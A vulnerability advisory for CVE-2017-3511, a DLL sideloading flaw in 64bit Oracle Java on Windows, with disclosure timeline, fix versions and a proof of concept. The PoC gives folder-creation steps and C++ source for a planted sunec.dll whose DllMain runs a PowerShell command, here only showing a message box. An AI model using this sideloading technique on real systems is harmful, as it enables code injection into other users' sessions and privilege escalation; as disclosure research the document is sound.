Oracle Java 64bit DLL Hijacking

`Code Injection through DLL Sideloading in 64bit Oracle Java  
  
Metadata  
===================================================  
Release Date: 19-March-2017  
Author: Florian Bogner // https://bogner.sh  
Affected product: 64bit Oracle Java on Windows (https://java.com/en/)  
Fixed in: Java SE: 7u131, 8u121; Java SE Embedded: 8u121; JRockit: R28.3.13  
Tested on: Windows 7 and Windows 2008R2  
CVE: CVE-2017-3511  
URL: https://bogner.sh/2017/04/cve-2017-3511-code-injection-through-dll-sideloading-in-64bit-oracle-java  
Video: https://youtu.be/bEiC4JLrV_4  
Vulnerability Status: Fixed in Oracle Critical Patch Update Advisory - April 2017  
  
Product Description  
===================================================  
Java is a set of computer software and specifications developed by Sun Microsystems, which was later acquired by the Oracle Corporation, that provides a system for developing application software and deploying it in a cross-platform computing environment. Java is used in a wide variety of computing platforms from embedded devices and mobile phones to enterprise servers and supercomputers.  
~https://en.wikipedia.org/wiki/Java_(software_platform)  
  
Vulnerability Description  
===================================================  
Vulnerable 64bit Oracle Java versions on Windows try to load some of their (crypto) dependencies from the non-existing folder C:\Program%20Files\Java\jre[version]\lib\ext. This is most likely caused by some kind of encoding issue as %20 represents an URL-encoded space. As any local user is allowed to append new folders on the C: driveas root, the Program%20Files folder can be created. Thereby, any local user can place a malicious DLL into C:\Program%20Files\Java\jre1.8.0_101\lib\ext.  
  
Hence, code can be injected into other useras Windows sessions. Additionally if any vulnerable Java application is running as privileged application (SYSTEM, local admin, domain admin) this issue can also be used to escalate oneas permissions vertically.  
  
Suggested Solution  
===================================================  
Update to the latest version.  
  
Disclosure Timeline  
===================================================  
8.8.2016: The issues have been documented and reported  
10.8.2016: The issue has been confirmed by the vendor  
6.12.2016: CVE-2017-3511 has been assigned  
19.4.2017: Fix release in Oracleas Critical Patch Update April 2017  
  
PoC  
===================================================  
1.) Build a "malicious" affected DLL like sunec.dll  
2.) Create the folder structure C:\Program%20Files\Java\jre1.8.0_101\lib\ext and place it in there.  
3.) Start a vulnerable application (like Burp or Angry IP Scanner)  
  
The following source can be used to build the DLL  
#include <process.h>  
  
/*   
"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" amd64  
cl.exe /D_USRDLL /D_WINDLL sunec.cpp /link /DLL /OUT:sunec.dll  
*/  
  
/* export all required functions - use Dependency Walker to check what is needed */  
extern "C"  
{  
__declspec(dllexport) int Java_sun_security_ec_ECDHKeyAgreement_deriveKey();  
__declspec(dllexport) int Java_sun_security_ec_ECDSASignature_signDigest();  
__declspec(dllexport) int Java_sun_security_ec_ECDSASignature_verifySignedDigest();  
__declspec(dllexport) int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair();  
}  
  
/*   
Implement DLLMain with common datatypes so we don't have to include windows.h.   
*/  
int DllMain(void* hinst, unsigned long* reason, void* reserved) {  
system("powershell -Command \"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[System.Windows.Forms.MessageBox]::Show('DLL Loaded')\"");  
exit(1);  
return 0;  
}  
  
/* Implement stubs of our exports */  
int Java_sun_security_ec_ECDHKeyAgreement_deriveKey() {  
return 0;  
}  
  
int Java_sun_security_ec_ECDSASignature_signDigest() {  
return 0;  
}  
  
int Java_sun_security_ec_ECDSASignature_verifySignedDigest() {  
return 0;  
}  
  
int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair() {  
return 0;  
}  
  
Florian Bogner  
  
eMail: [email protected]  
Web: http://www.bogner.sh  
LinkedIn: https://www.linkedin.com/profile/view?id=368904276  
Xing: https://www.xing.com/profile/Florian_Bogner9  
  
  
  
`